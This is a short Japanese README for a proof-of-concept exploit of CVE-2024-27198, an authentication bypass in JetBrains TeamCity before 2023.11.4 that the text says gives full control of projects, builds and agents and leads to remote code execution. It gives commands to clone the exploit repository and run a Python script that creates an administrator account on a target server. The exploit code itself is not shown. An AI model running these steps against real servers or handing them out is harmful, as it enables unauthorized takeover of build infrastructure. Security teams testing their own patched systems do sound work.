
CVE-2024-27198に関するPoC
JetBrains TeamCity 2023.11.4 より前のバージョンでは、認証バイパスにより TeamCity サーバー上で管理操作を実行できます。攻撃者はすべての TeamCity プロジェクト、ビルド、エージェント、成果物を完全に制御でき、最終的には RCE を実行します。
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
サーバー内に管理者権限を持つアカウントを作成するには:
python3 cve-2024-27198.py http://example.com username password

